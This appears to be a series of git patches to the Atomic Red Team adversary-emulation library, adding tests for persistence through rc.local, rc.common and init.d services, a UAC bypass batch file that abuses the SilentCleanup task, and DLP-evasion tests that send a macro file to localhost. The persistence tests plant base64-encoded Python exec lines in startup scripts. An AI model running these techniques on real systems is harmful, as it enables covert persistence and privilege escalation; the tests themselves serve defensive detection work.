From cec771d64f0dc6c4464b247e58b835c0fcbcc49a Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Sat, 29 May 2021 14:54:22 -0700 Subject: [PATCH 01/14] Add test for T1037.004 that modifies rc.local and rc.common files on Linux --- atomics/T1037.004/T1037.004.yaml | 37 ++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 8b664b82..9ec58a6f 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -15,3 +15,40 @@ atomic_tests: elevation_required: true name: bash + +- name: rc.common + description: | + Modify rc.common + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: | + origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi + +- name: rc.local + description: | + Modify rc.local + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: | + origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + From b19ac6e34e088a8461c9287fbbd033c554d5c27f Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Sat, 29 May 2021 22:48:31 -0700 Subject: [PATCH 02/14] Update T1037.004.md : Atomic Doc Generated using bin/generate-atomic-docs.rb --- atomics/T1137.004/T1137.004.md | 102 ++++++++++++++++++++++++++------- 1 file changed, 81 insertions(+), 21 deletions(-) diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 858ef875..5e258a38 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,45 +1,105 @@ -# T1137.004 - Outlook Home Page -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) -
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) +# T1037.004 - RC Scripts +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) +
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. -Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) -
+Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + +Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + +Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
## Atomic Tests -- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence) +- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) + +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
-## Atomic Test #1 - Install Outlook Home Page Persistence -This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. +## Atomic Test #1 - rc.common +Modify rc.common -Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). +[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) -**Supported Platforms:** Windows +**Supported Platforms:** macOS -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| -| outlook_version | Version of Outlook that is installed | string | 16.0| -| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -#### Attack Commands: Run with `command_prompt`! +```bash +sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common +``` -```cmd -reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f + + + + +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common ``` #### Cleanup Commands: -```cmd -reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi ``` From 557bd84925f3f2914fd5b6c6608abcbc82b9549e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 19:56:20 -0700 Subject: [PATCH 03/14] Atomic Tests for T1543.002 : Ubuntu, CentOS, Kali --- atomics/T1543.002/T1543.002.md | 65 ++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..6f2f4e4b 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) +
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. +##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. +``` + + + +
From 980c7e8bd56019b4a11b37e67231c81ee50d596a Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 2 Jun 2021 21:48:22 -0500 Subject: [PATCH 04/14] T1548.002-Update (#1492) * T1548.002-Update * formatting Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1548.002/T1548.002.yaml | 25 +++++++++++++++++++++++++ atomics/T1548.002/src/T1548.002.bat | 8 ++++++++ 2 files changed, 33 insertions(+) create mode 100644 atomics/T1548.002/src/T1548.002.bat diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 5186a236..17eb59f5 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -162,3 +162,28 @@ atomic_tests: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f name: command_prompt elevation_required: true +- name: Bypass UAC using SilentCleanup task + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: | + #{file_path} + name: command_prompt + elevation_required: false diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat new file mode 100644 index 00000000..d873b527 --- /dev/null +++ b/atomics/T1548.002/src/T1548.002.bat @@ -0,0 +1,8 @@ +@echo off +mode 18,1 +color FE +reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul +timeout /t 2 >nul +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul +timeout /t 3 >nul +reg delete "HKCU\Environment" /v "windir" /F \ No newline at end of file From 3726625d5809ae768d509383753c58418103674d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 3 Jun 2021 02:48:38 +0000 Subject: [PATCH 05/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1548.002/T1548.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 17eb59f5..619b5f6a 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -163,6 +163,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7d1c8c5d..361e31fb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -704,3 +704,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 788e0019-a483-45da-bcfe-96353d46820f 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff +28104f8a-4ff1-4582-bcf6-699dce156608 From 7549cc7d616fc60542f2aedefe1ed2db0b336f7b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 02:48:44 +0000 Subject: [PATCH 06/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 50 +++++++++++++++++++ atomics/T1548.002/T1548.002.md | 41 +++++++++++++++ 6 files changed, 99 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e84bab59..8f816a2c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e3a45879..703da0de 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3a916e39..d1a78b05 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -227,6 +227,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -417,6 +418,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6433b60d..d1f5864e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -178,6 +178,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -308,6 +309,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af7d14dd..375f275d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -10120,6 +10120,31 @@ privilege-escalation: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1574.012: technique: external_references: @@ -19315,6 +19340,31 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1218.003: technique: external_references: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 98064122..597dc756 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task) +
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En +
+
+ +## Atomic Test #9 - Bypass UAC using SilentCleanup task +Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + +There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + +For example, we can set the windir registry kye to: "cmd /k REM " + +And forcefully run SilentCleanup task: + +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + +REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{file_path} +``` + + + + + +
From 1540de2d2135095a0766f2123aaffbe3d2fdf881 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 3 Jun 2021 07:46:26 -0600 Subject: [PATCH 07/14] corrections as per BoBoSiKi008 (#1494) see Issue #1490 --- atomics/T1027/T1027.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4288d3ae..7210e5af 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -109,7 +109,7 @@ atomic_tests: supported_platforms: - windows input_arguments: - input_file: + input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm @@ -125,10 +125,9 @@ atomic_tests: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" + Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP @@ -147,8 +146,7 @@ atomic_tests: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell From 9a3528e02721eb8b937b540559dfa6f8e2f884b8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 13:47:03 +0000 Subject: [PATCH 08/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 9 +++------ atomics/T1027/T1027.md | 4 ++-- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 375f275d..7db65eb5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28937,11 +28937,9 @@ defense-evasion: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 - Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm - -SmtpServer #{smtp_server}" + command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' + -Attachments #{input_file} -SmtpServer #{smtp_server} ' name: powershell @@ -28961,9 +28959,8 @@ defense-evasion: 